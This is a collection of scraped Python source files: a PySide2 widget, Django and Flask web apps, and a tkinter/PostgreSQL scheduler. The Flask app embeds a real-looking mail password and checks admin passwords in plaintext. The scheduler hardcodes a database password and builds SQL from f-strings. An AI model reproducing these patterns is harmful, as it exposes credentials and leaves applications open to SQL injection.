NAMES\n self.features_menu.addAction(self.features_actions[feat_id])\n except ValueError:\n # Dealing with a model\n group, model, param = feat_id.split('.')\n # print(group, model, param)\n param_path = 'metaparams/' + param\n param_desc = cfg.features.models[model].getInfo(infos=param_path + '/desc')\n param_desc_short = cfg.features.models[model].getInfo(infos=param_path + '/desc_short')\n param_formula = cfg.features.models[model].getInfo(infos=param_path + '/formula')\n if param_formula:\n param_desc_short += ': ' + param_formula\n self.features_actions[feat_id] = QtWidgets.QAction(param_desc_short, self)\n self.features_actions[feat_id].setToolTip(param_desc)\n self.models_submenus[model].addAction(self.features_actions[feat_id])\n\n self.features_button.setMenu(self.features_menu)\n\n def getButton(self):\n return self.features_button\n\n def getQActions(self):\n return self.features_actions\n\n def getFeaturesDesc(self):\n return self.features_desc\n\n\nclass FeaturesWidget(QtWidgets.QWidget):\n\n gui_to_ctrl = QtCore.Signal(dict)\n\n def __init__(self):\n QtWidgets.QWidget.__init__(self)\n\n self.id = id(self) # used to 'sign' signals\n self.sorted_text = \"\"\n self.displayed_text = \"\"\n\n self.layout = QtWidgets.QHBoxLayout()\n\n self.features_menu = FeaturesMenu('Default order',\n prefix='Sorted by')\n self.features_desc = self.features_menu.getFeaturesDesc()\n self.features_infos = self.features_desc['FEATURES']\n self.features_button = self.features_menu.getButton()\n self.features_button.setToolTip(\"Select a feature to sort and display\\n\" +\n \"SHIFT+click to sort while keeping the current feature displayed\\n\" +\n \"CONTROL+click to display a feature while keeping the current sort order\")\n self.features_actions = self.features_menu.getQActions()\n for feat_id in self.features_actions.keys():\n sort_by_feature = functools.partial(self.sortByFeatureId, feat_id)\n self.features_actions[feat_id].triggered.connect(sort_by_feature)\n self.layout.addWidget(self.features_button)\n\n # self.features_combo = gui.NoKeyEventCombo()\n # self.layout.addWidget(self.features_combo)\n # self.features_list = []\n # for feat_id, _, description in cfg.features.iterateFeatures(description=True):\n # self.features_list.append(feat_id)\n # self.features_combo.addItem(description)\n # self.features_combo.currentIndexChanged.connect(self.sortByFeature)\n\n self.sort_order = QtWidgets.QCheckBox(\"Decreasing order\")\n self.sort_order.setCheckState(QtCore.Qt.Unchecked)\n self.sort_order.setToolTip(\"Hold SHIFT to disable auto-refresh\")\n self.sort_order.stateChanged.connect(self.sortOrder)\n self.layout.addWidget(self.sort_order)\n\n # self.plot_btn = QtWidgets.QPushButton(\"Plot feature(s)\")\n # self.plot_menu = QtWidgets.QMenu(\"Features plots\", self.plot_btn)\n # self.features_plot = []\n # self.plot_single = QtWidgets.QAction(\"station-feature\")\n # self.plot_single.triggered.connect(functools.partial(self.plotFeatures, False))\n # self.plot_menu.addAction(self.plot_single)\n # self.plot_multi = QtWidgets.QAction(\"feature1-feature2\")\n # self.plot_multi.triggered.connect(functools.partial(self.plotFeatures, True))\n # self.plot_menu.addAction(self.plot_multi)\n # self.plot_btn.setMenu(self.plot_menu)\n # self.layout.addWidget(self.plot_btn)\n\n self.setLayout(self.layout)\n\n @QtCore.Slot()\n def sortByFeatureId(self, feat_id):\n kb_modifiers = QtWidgets.QApplication.keyboardModifiers()\n try:\n group, feat = feat_id.split('.')\n if group:\n name = 
self.features_infos[group][feat]['desc']\n                formula = self.features_infos[group][feat].get('formula', '')\n            else:\n                name = self.features_infos[feat]['desc']\n                formula = ''\n            name = name[0].lower() + name[1:]\n            if formula:\n                name = f'{name}: {formula}'\n            if kb_modifiers == QtCore.Qt.ControlModifier:\n                # Display feature but keep previous sorting as is\n                self.displayed_text = name\n                #self.sorted_text doesn't change\n            elif kb_modifiers == QtCore.Qt.ShiftModifier:\n                # Sort with feature but keep previous feature displayed\n                self.sorted_text = name\n                #self.displayed_text doesn't change\n            else:\n                # By default, sort and display newly selected feature\n                self.sorted_text = name\n                self.displayed_text = self.sorted_text\n        except ValueError:\n            # Dealing with a model parameter\n            _, model, param = feat_id.split('.')\n            param_path = 'metaparams/' + param\n            param = cfg.features.models[model].getInfo(infos=param_path + '/desc_short')\n            model = cfg.features.models[model].getInfo(infos='desc_short')\n            if kb_modifiers == QtCore.Qt.ControlModifier:\n                # Display feature but keep previous sorting as is\n                self.displayed_text = f\"{param:s} ({model:s})\"\n                #self.sorted_text doesn't change\n            elif kb_modifiers == QtCore.Qt.ShiftModifier:\n                # Sort with feature but keep previous feature displayed\n                self.sorted_text = f\"{param:s} ({model:s})\"\n                #self.displayed_text doesn't change\n            else:\n                # By default, sort and display newly selected feature\n                self.sorted_text = f\"{param:s} ({model:s})\"\n                self.displayed_text = self.sorted_text\n\n        if self.displayed_text == self.sorted_text:\n            text = \"Sorted by \" + self.sorted_text\n        else:\n            text = \"Sorted by {:s}, display {:s}\".format(self.sorted_text, self.displayed_text)\n        self.features_button.setText(text)\n\n        message = {}\n        reversed = True if self.sort_order.checkState() == QtCore.Qt.Checked else False\n        if kb_modifiers == QtCore.Qt.ControlModifier:\n            message.update({'DISPLAY_FEATURE': feat_id})\n        elif kb_modifiers == QtCore.Qt.ShiftModifier:\n            message.update({'SORT_BY': (feat_id, not reversed)})\n        else:\n            message.update({'DISPLAY_FEATURE': feat_id})\n            message.update({'SORT_BY': (feat_id, not reversed)})\n        self.send(message)\n\n    @QtCore.Slot()\n    def sortByFeature(self, ifeature):\n        feature_id = self.features_list[ifeature]\n        kb_modifiers = QtWidgets.QApplication.keyboardModifiers()\n        message = {}\n        reversed = True if self.sort_order.checkState() == QtCore.Qt.Checked else False\n        if kb_modifiers == QtCore.Qt.ControlModifier:\n            message.update({'DISPLAY_FEATURE': feature_id})\n        elif kb_modifiers == QtCore.Qt.ShiftModifier:\n            message.update({'SORT_BY': (feature_id, not reversed)})\n        else:\n            message.update({'DISPLAY_FEATURE': feature_id})\n            message.update({'SORT_BY': (feature_id, not reversed)})\n        self.send(message)\n\n    @QtCore.Slot()\n    def sortOrder(self, state):\n        modifiers = QtWidgets.QApplication.keyboardModifiers()\n        checked = True if state == 2 else False\n        reversed = checked\n        sort_message = {'SORT_BY': (None, not reversed)}\n        if modifiers == QtCore.Qt.ShiftModifier:\n            sort_message.update({'DELAY_SORT': True})\n        self.send(sort_message)\n\n    def plotFeatures(self, multi=False):\n        self.features_plot.append(FeaturesPlotWindow(feat_id1=cfg.sort_by, multi=multi))\n        self.features_plot[-1].show()\n\n    def send(self, message):\n        message['FROM'] = self.id\n        self.gui_to_ctrl.emit(message)\n\n# import pyqtgraph as pg\n\n# raw_data = np.asarray(list(feature.values()))\n# scatter_data = np.zeros(len(raw_data),\n#                          dtype={'names':('feat1', 'feat2'),\n#                                'formats':('f8', 'f8')})\n# # 
scatter_data['fields'] = cfg.stalist\n# scatter_data['feat1'] = np.r_[1:cfg.nsta+.5]\n# scatter_data['feat2'] = raw_data\n# scatter_data = scatter_data.view(np.recarray)\n# self.scatter = pg.ScatterPlotWidget()\n# self.scatter.setData(scatter_data)\n# self.scatter.setFields([('feat1', {'units': 'toto'}), ('feat2', {'units': 'toto'})])\n# self.scatter.show()\n# return\n", "repo_name": "yannziegler/Pygoda", "sub_path": "pygoda/gui/features_widgets.py", "file_name": "features_widgets.py", "file_ext": "py", "file_size_in_byte": 11526, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "41", "api": [{"api_name": "PySide2.QtWidgets.QPushButton", "line_number": 15, "usage_type": "attribute"}, {"api_name": "PySide2.QtWidgets", "line_number": 15, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QPushButton.__init__", "line_number": 18, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QPushButton", "line_number": 18, "usage_type": "attribute"}, {"api_name": "PySide2.QtWidgets", "line_number": 18, "usage_type": "name"}, {"api_name": "datasets.timeseries_features.load_features_desc", "line_number": 20, "usage_type": "call"}, {"api_name": "datasets.timeseries_features", "line_number": 20, "usage_type": "name"}, {"api_name": "datasets.fit_data.timeseries_models_names", "line_number": 23, "usage_type": "attribute"}, {"api_name": "datasets.fit_data", "line_number": 23, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QPushButton", "line_number": 29, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", "line_number": 29, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QMenu", "line_number": 30, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", "line_number": 30, "usage_type": "name"}, {"api_name": "config.features.iterateFeatures", "line_number": 39, "usage_type": "call"}, {"api_name": "config.features", "line_number": 39, "usage_type": "attribute"}, {"api_name": "PySide2.QtWidgets.QAction", "line_number": 43, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", "line_number": 43, "usage_type": "name"}, {"api_name": "config.features.iterateFeatures", "line_number": 57, "usage_type": "call"}, {"api_name": "config.features", "line_number": 57, "usage_type": "attribute"}, {"api_name": "PySide2.QtWidgets.QAction", "line_number": 64, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", "line_number": 64, "usage_type": "name"}, {"api_name": "config.features", "line_number": 76, "usage_type": "attribute"}, {"api_name": "config.features", "line_number": 77, "usage_type": "attribute"}, {"api_name": "config.features", "line_number": 78, "usage_type": "attribute"}, {"api_name": "PySide2.QtWidgets.QAction", "line_number": 81, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", "line_number": 81, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QWidget", "line_number": 97, "usage_type": "attribute"}, {"api_name": "PySide2.QtWidgets", "line_number": 97, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Signal", "line_number": 99, "usage_type": "call"}, {"api_name": "PySide2.QtCore", "line_number": 99, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QWidget.__init__", "line_number": 102, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QWidget", "line_number": 102, "usage_type": "attribute"}, {"api_name": "PySide2.QtWidgets", "line_number": 102, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QHBoxLayout", "line_number": 108, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", 
"line_number": 108, "usage_type": "name"}, {"api_name": "functools.partial", "line_number": 120, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QCheckBox", "line_number": 132, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", "line_number": 132, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 133, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore", "line_number": 133, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QApplication.keyboardModifiers", "line_number": 154, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QApplication", "line_number": 154, "usage_type": "attribute"}, {"api_name": "PySide2.QtWidgets", "line_number": 154, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 166, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore", "line_number": 166, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 170, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore", "line_number": 170, "usage_type": "name"}, {"api_name": "config.features", "line_number": 182, "usage_type": "attribute"}, {"api_name": "config.features", "line_number": 183, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 184, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore", "line_number": 184, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 188, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore", "line_number": 188, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 204, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore", "line_number": 204, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 205, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore", "line_number": 205, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 207, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore", "line_number": 207, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Slot", "line_number": 152, "usage_type": "call"}, {"api_name": "PySide2.QtCore", "line_number": 152, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QApplication.keyboardModifiers", "line_number": 217, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QApplication", "line_number": 217, "usage_type": "attribute"}, {"api_name": "PySide2.QtWidgets", "line_number": 217, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 219, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore", "line_number": 219, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 220, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore", "line_number": 220, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 222, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore", "line_number": 222, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Slot", "line_number": 214, "usage_type": "call"}, {"api_name": "PySide2.QtCore", "line_number": 214, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QApplication.keyboardModifiers", "line_number": 231, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QApplication", "line_number": 231, "usage_type": "attribute"}, {"api_name": "PySide2.QtWidgets", "line_number": 231, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 235, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore", "line_number": 235, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Slot", "line_number": 229, "usage_type": "call"}, {"api_name": 
"PySide2.QtCore", "line_number": 229, "usage_type": "name"}, {"api_name": "config.sort_by", "line_number": 240, "usage_type": "attribute"}]} +{"seq_id": "39235840623", "text": "from django.forms import ModelForm, TextInput, Textarea, CheckboxInput\n\nfrom .models import Order\n\nTEXT_INPUT = TextInput(attrs={'class': 'form-control'})\n\n\nclass OrderForm(ModelForm):\n class Meta:\n model = Order\n fields = [\n 'customer_name',\n 'phone_number',\n 'email',\n 'pickup',\n 'delivery_address',\n 'comment',\n ]\n widgets = {\n 'customer_name': TEXT_INPUT,\n 'phone_number': TEXT_INPUT,\n 'email': TEXT_INPUT,\n 'pickup': CheckboxInput(attrs={'class': 'form-inline'}),\n 'delivery_address': TEXT_INPUT,\n 'comment': Textarea(attrs={\n 'class': 'form-control',\n 'rows': 3,\n }),\n }\n labels = {\n 'customer_name': 'Имя*',\n 'phone_number': 'Номер телефона*',\n 'pickup': 'Самовывоз',\n 'delivery_address': 'Полный адрес',\n 'comment': 'Комментарий',\n }\n", "repo_name": "skantaev/my_store", "sub_path": "my_store_app/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 1069, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "django.forms.TextInput", "line_number": 5, "usage_type": "call"}, {"api_name": "django.forms.ModelForm", "line_number": 8, "usage_type": "name"}, {"api_name": "models.Order", "line_number": 10, "usage_type": "name"}, {"api_name": "django.forms.CheckboxInput", "line_number": 23, "usage_type": "call"}, {"api_name": "django.forms.Textarea", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "38701278350", "text": "# -*- coding: utf-8 -*-\nfrom flask import *\nfrom flask import session as login_session\nfrom sqlalchemy.exc import IntegrityError\nfrom model import *\nfrom werkzeug.utils import secure_filename\nimport json, ast\nimport datetime\nimport os\nfrom forms import ContactForm\nimport pyperclip\n#Firebase\n# import firebase_admin\n# from firebase_admin import credentials\n# from firebase_admin import firestore\n\n\n# Flask Mail\nfrom flask_mail import Message, Mail\n\nmail = Mail()\n\nUPLOAD_FOLDER = 'static/productsImages'\nALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg'])\n\n\napp = Flask(__name__)\napp.secret_key = \"MY_SUPER_SECRET_KEY\"\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\n# Flask Mail\napp.config[\"MAIL_SERVER\"] = \"smtp.gmail.com\"\napp.config[\"MAIL_PORT\"] = 465\napp.config[\"MAIL_USE_SSL\"] = True\napp.config[\"MAIL_USERNAME\"] = 'boomboompass.game@gmail.com'\napp.config[\"MAIL_PASSWORD\"] = 'Qloai1107'\n\n\n\nmail.init_app(app)\n\n# LOCAL\nengine = create_engine('sqlite:///database.db')\n\nBase.metadata.bind = engine\nDBSession = sessionmaker(bind=engine, autoflush=False)\nsession = DBSession()\n\n# FIREBASE\n# cred = credentials.ApplicationDefault()\n# firebase_admin.initialize_app(cred, {\n# 'projectId': 'boom-boom-pass-website',\n# })\n\n# db = firestore.client()\n\n# doc_ref = db.collection(u'users').document(u'alovelace')\n# doc_ref.set({\n# u'first': u'Ada',\n# u'last': u'Lovelace',\n# u'born': 1815\n# })\n \n# doc_ref = db.collection(u'users').document(u'aturing')\n# doc_ref.set({\n# u'first': u'Alan',\n# u'middle': u'Mathison',\n# u'last': u'Turing',\n# u'born': 1912\n# })\n# snippets.py\n\n\ndef allowed_file(filename):\n\treturn '.' 
in filename and \\\n\t\tfilename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n# @app.route('/',methods=['GET','POST'])\n@app.route('/bbp', methods=['GET','POST'])\ndef betaSignup():\n\tform = ContactForm()\n\n\tif request.method == 'POST':\n\t\tname = request.form['name']\n\t\temail = request.form['email']\n\n\t\tform.name=name\n\t\tform.email=email\n\t\tform.message=\"Good Luck!\"\n\n\t\t# if form.name != \"\" and form.email!= \"\" and form.message != \"\":\n\t\t# \tmsg = Message(\"Beta Signup!\", sender='BBP.Beta@gmail.com', recipients=['boomboompass.game@gmail.com'])\n\t\t# \tmsg.body = \"\"\"\n\t\t# \tRegistered: %s <%s>\n\t\t# \t%s\n\t\t# \t\"\"\" % (form.name, form.email, form.message)\n\t\t# \tmail.send(msg)\n\t\t# \tprint(\"message sent\")\n\n\t\tEmailObject = Emails(name=name,email=email)\n\t\tsession.add(EmailObject)\n\t\tsession.commit()\n\t\n\treturn render_template('index.html', form=form)\n\n@app.route('/bugs', methods=['GET','POST'])\ndef bugReporting():\n\tform = ContactForm()\n\n\tif request.method == 'POST':\n\t\tform.name = request.form['name']\n\t\tform.email = request.form['email']\n\t\tform.message = request.form['message']\n\n\t\tif form.name != \"\" and form.email!= \"\" and form.message != \"\":\n\t\t\tmsg = Message(\"Bug Report\", sender='NoReply_BBP_Bugs@gmail.com', recipients=['boomboompass.game@gmail.com'])\n\t\t\tmsg.body = \"\"\"\n\t\t\tFrom: %s <%s>\n\t\t\tMessage: %s\n\t\t\t\"\"\" % (form.name, form.email, form.message)\n\t\t\tmail.send(msg)\n\t\t\tprint(\"message sent\")\n\n\t\t\treturn render_template('bugReport.html',done=True)\n\t\n\treturn render_template('bugReport.html')\n\n@app.route('/admin',methods=['GET','POST'])\ndef adminSignin():\n\tif 'idAdmin' in login_session:\n\t\tadmin = session.query(Admin).filter_by(id=login_session['idAdmin']).one()\n\t\treturn redirect(url_for('admin'))\n\n\tif request.method == 'POST':\n\t\tusername = request.form[\"username\"]\n\t\tpassword = request.form[\"password\"]\n\t\t\n\t\tadminCheck=session.query(Admin).filter_by(username=username).first()\n\n\t\tif(adminCheck != None and adminCheck.password==password):\n\t\t\t# Logged in successfully\n\t\t\tlogin_session['idAdmin'] = adminCheck.id\n\t\t\treturn redirect(url_for('admin'))\n\t\telse:\n\t\t\treturn redirect(url_for('adminSignin'))\n\telse:\n\t\treturn render_template('adminSignin.html')\n\n@app.route('/admin-panel-secret-login', methods=['GET','POST'])\ndef admin():\n\tif 'idAdmin' in login_session:\n\t\temails = session.query(Emails).all()\n\n\t\treturn render_template('admin.html' , emails=emails)\n\telse:\n\t\treturn redirect(url_for('adminSignin'))\n\n@app.route('/deleteEmail/', methods=['GET','POST'])\ndef deleteEmail(id):\n\tif 'idAdmin' in login_session:\n\t\temail = session.query(Emails).filter_by(id=id).first()\n\n\t\tsession.delete(email)\n\t\tsession.commit()\n\n\treturn redirect(url_for('admin'))\t\n\n@app.route('/copyEmails',methods=['GET','POST'])\ndef copyEmails():\n\tif 'idAdmin' in login_session:\n\t\temails = session.query(Emails).all()\n\n\t\temailsList=[]\n\t\tfor email in emails:\n\t\t\temailsList.append(str(email.email))\n\n\t\temailsToCopy = \",\".join(emailsList)\n\n\t\tpyperclip.copy(emailsToCopy)\n\n\t\treturn redirect(url_for('admin'))\n\telse:\n\t\treturn redirect(url_for('adminSignin'))\n\n@app.route('/logout', methods=['GET','POST'])\ndef logout():\n\tif 'idAdmin' in login_session:\n\t\tdel login_session['idAdmin']\n\treturn redirect(url_for('adminSignin'))\n\n\nif __name__ == '__main__':\n\tapp.run(debug=True)\n", 
"repo_name": "Loai17/Boom-Boom-Pass-Website", "sub_path": "webapp.py", "file_name": "webapp.py", "file_ext": "py", "file_size_in_byte": 4861, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "flask_mail.Mail", "line_number": 21, "usage_type": "call"}, {"api_name": "forms.ContactForm", "line_number": 81, "usage_type": "call"}, {"api_name": "forms.ContactForm", "line_number": 108, "usage_type": "call"}, {"api_name": "flask_mail.Message", "line_number": 116, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 130, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 131, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 142, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 151, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 160, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 170, "usage_type": "name"}, {"api_name": "pyperclip.copy", "line_number": 179, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 187, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 188, "usage_type": "name"}]} +{"seq_id": "73685979323", "text": "# app.py\n\nfrom Prediction_model import RegularizedLinearRegression\nimport numpy as np\n\nfrom flask import Flask, request, render_template\n\napp = Flask(__name__)\n\ndef load_model():\n # Assuming 'model' is an instance of your trained model\n loaded_model = RegularizedLinearRegression()\n loaded_model.load_model(\"trained_model.npz\")\n\n\n return loaded_model\n\n# Gradient background color\nbackground_color = \"linear-gradient(to right, #ff8a00, #da1b60)\"\n\n# Your encoding function using Label Encoder\ndef encode_input(month, date, day, year, day_encoding, month_encoding):\n \n encoded_month = month_encoding[month] \n encoded_day = day_encoding[day]\n \n encoded_input = np.array([encoded_month, \n int(date), \n encoded_day,\n int(year)])\n \n #print(\"Encoded_shape: \", encoded_input.shape)\n\n return encoded_input.reshape(1, -1)\n\n\n@app.route('/')\ndef home():\n return render_template('index.html', background_color=background_color)\n\n# +\n@app.route('/predict', methods=['POST'])\ndef predict():\n if request.method == 'POST':\n # Load the model and encoders\n loaded_model = load_model()\n\n # Get input values from the form\n month = request.form['month']\n date = request.form['date']\n day = request.form['day']\n year = request.form['year']\n \n day_encoding = {'Friday': 0, 'Monday': 1, 'Saturday': 2, 'Sunday': 3, 'Thursday': 4, 'Tuesday': 5, 'Wednesday': 6}\n month_encoding = {'April': 0, 'August': 1, 'December': 2, 'February': 3, 'January': 4, 'July': 5, 'June': 6, 'March': 7, 'May': 8, 'November': 9, 'October': 10, 'September': 11}\n\n \n # Validate inputs\n is_valid = True\n\n if day not in day_encoding:\n is_valid = False\n \n if month not in month_encoding:\n is_valid = False\n \n if date.isdigit() and 1 <= int(date) <= 31:\n date = int(date)\n \n else:\n is_valid = False\n \n \n if not is_valid:\n # Show error message\n error_msg = \"Invalid input, please try again\"\n return render_template('index.html', error=error_msg, background_color=background_color)\n\n # Encode and predict if valid\n encoded_input = encode_input(month, date, day, year, day_encoding, month_encoding)\n prediction = loaded_model.predict(encoded_input)\n\n return render_template('result.html', prediction=prediction[0], background_color=background_color)\n\n \n \n# 
-\n\n    # Encode the input\n    #encoded_input = encode_input(month, date, day, year)\n\n    # Make prediction\n    #prediction = loaded_model.predict(encoded_input)\n\n    #return render_template('result.html', prediction=prediction[0], background_color=background_color)\n\n\nif __name__ == '__main__':\n    app.run(debug=True)\n", "repo_name": "prachi-01998/Fetch", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 2939, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "flask.Flask", "line_number": 8, "usage_type": "call"}, {"api_name": "Prediction_model.RegularizedLinearRegression", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 27, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 39, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 44, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 44, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 49, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 49, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 50, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 50, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 51, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 51, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 52, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 52, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 77, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 83, "usage_type": "call"}]} +{"seq_id": "18980027638", "text": "import psycopg2 as pg2\nimport tkinter as tk\nfrom tkinter import ttk\nfrom tkcalendar import Calendar, DateEntry\n\ndef insert_availability(**kwargs):\n    conn = None\n    try:\n        conn = pg2.connect(database='Work schedule', user='postgres', password='Damdamdam123!')\n        cur = conn.cursor()\n\n        start_date = kwargs.get('start_date', None)\n        end_date = kwargs.get('end_date', None)\n        start_work = kwargs.get('start_work', None)\n        end_of_work = kwargs.get('end_of_work', None)\n        day = kwargs.get('day', None)\n        if start_date == None:\n            start_date = kwargs.get('start_date', 'null')\n        else:\n            start_date = f\"'{start_date}'\"\n\n        if end_date == None:\n            end_date = kwargs.get('end_date', 'null')\n        else:\n            end_date = f\"'{end_date}'\"\n\n        if start_work == None:\n            start_work = kwargs.get('start_work', 'null')\n        else:\n            start_work = f\"'{start_work}'\"\n\n        if end_of_work == None:\n            end_of_work = kwargs.get('end_of_work', 'null')\n        else:\n            end_of_work = f\"'{end_of_work}'\"\n\n        if day == None:\n            day = kwargs.get('day', 'null')\n        else:\n            day = f\"'{day}'\"\n\n        cur.execute(\n            f\"INSERT INTO availability(date_1,date_2,start_work,end_work,day_of_the_week)\"\n            f\"VALUES({start_date},{end_date},{start_work},{end_of_work},{day})\")\n        conn.commit()\n\n        cur.execute(\"SELECT * FROM availability\")\n        rows = cur.fetchall()\n\n        for row in rows:\n            print(f\"ID: {row[0]}\")\n            print(f\"Data początkowa: {row[1]}\")\n            print(f\"Data końcowa: {row[2]}\")\n\n    except(Exception, pg2.DatabaseError) as error:\n        print(error)\n    finally:\n        if conn is not None:\n            conn.close()\n\n\ndef date_from():\n    def print_sel():\n        print(cal.selection_get())\n\n    top = tk.Toplevel(root)\n\n    cal = Calendar(top,\n                   font=\"Arial 14\", 
selectmode='day',\n cursor=\"hand1\", year=2018, month=2, day=5)\n cal.pack(fill=\"both\", expand=True)\n ttk.Button(top, text=\"ok\", command=print_sel).pack()\n\n\ndef date_to():\n def print_sel():\n print(cal.get_date())\n top = tk.Toplevel(root)\n\n ttk.Label(top, text='Choose date').pack(padx=10, pady=10)\n cal = DateEntry(top, width=12, background='darkblue',\n foreground='white', borderwidth=2)\n cal.pack(padx=10, pady=10)\n ttk.Button(top, text=\"ok\", command=print_sel).pack()\n\nroot = tk.Tk()\ns = ttk.Style(root)\ns.theme_use('clam')\n\nttk.Button(root, text='Date from', command=date_from).grid(column=0, row=0)\nttk.Button(root, text='Date to', command=date_to).grid(column=0, row=1)\n\nroot.mainloop()\n\n\n\n\n# insert_availability(start_date='2022-02-01',\n# end_date=\"2022-03-01\",\n# start_work='08:00',\n# end_of_work='10:00',\n# day='Monday')\n\n", "repo_name": "dmidam/working_schedule", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2971, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "psycopg2.connect", "line_number": 9, "usage_type": "call"}, {"api_name": "psycopg2.DatabaseError", "line_number": 55, "usage_type": "attribute"}, {"api_name": "tkinter.Toplevel", "line_number": 66, "usage_type": "call"}, {"api_name": "tkcalendar.Calendar", "line_number": 68, "usage_type": "call"}, {"api_name": "tkinter.ttk.Button", "line_number": 72, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 72, "usage_type": "name"}, {"api_name": "tkinter.Toplevel", "line_number": 78, "usage_type": "call"}, {"api_name": "tkinter.ttk.Label", "line_number": 80, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 80, "usage_type": "name"}, {"api_name": "tkcalendar.DateEntry", "line_number": 81, "usage_type": "call"}, {"api_name": "tkinter.ttk.Button", "line_number": 84, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 84, "usage_type": "name"}, {"api_name": "tkinter.Tk", "line_number": 86, "usage_type": "call"}, {"api_name": "tkinter.ttk.Style", "line_number": 87, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 87, "usage_type": "name"}, {"api_name": "tkinter.ttk.Button", "line_number": 90, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 90, "usage_type": "name"}, {"api_name": "tkinter.ttk.Button", "line_number": 91, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 91, "usage_type": "name"}]} +{"seq_id": "74886432124", "text": "import logging\nimport subprocess\nimport os\nimport time\n\nimport matplotlib.pyplot as plt\n\nJAVA_BIN = 'C:\\Program Files\\Java\\jdk1.8.0_102'\nJAVAC = os.path.join(JAVA_BIN, 'bin', 'javac.exe')\nJAVA = 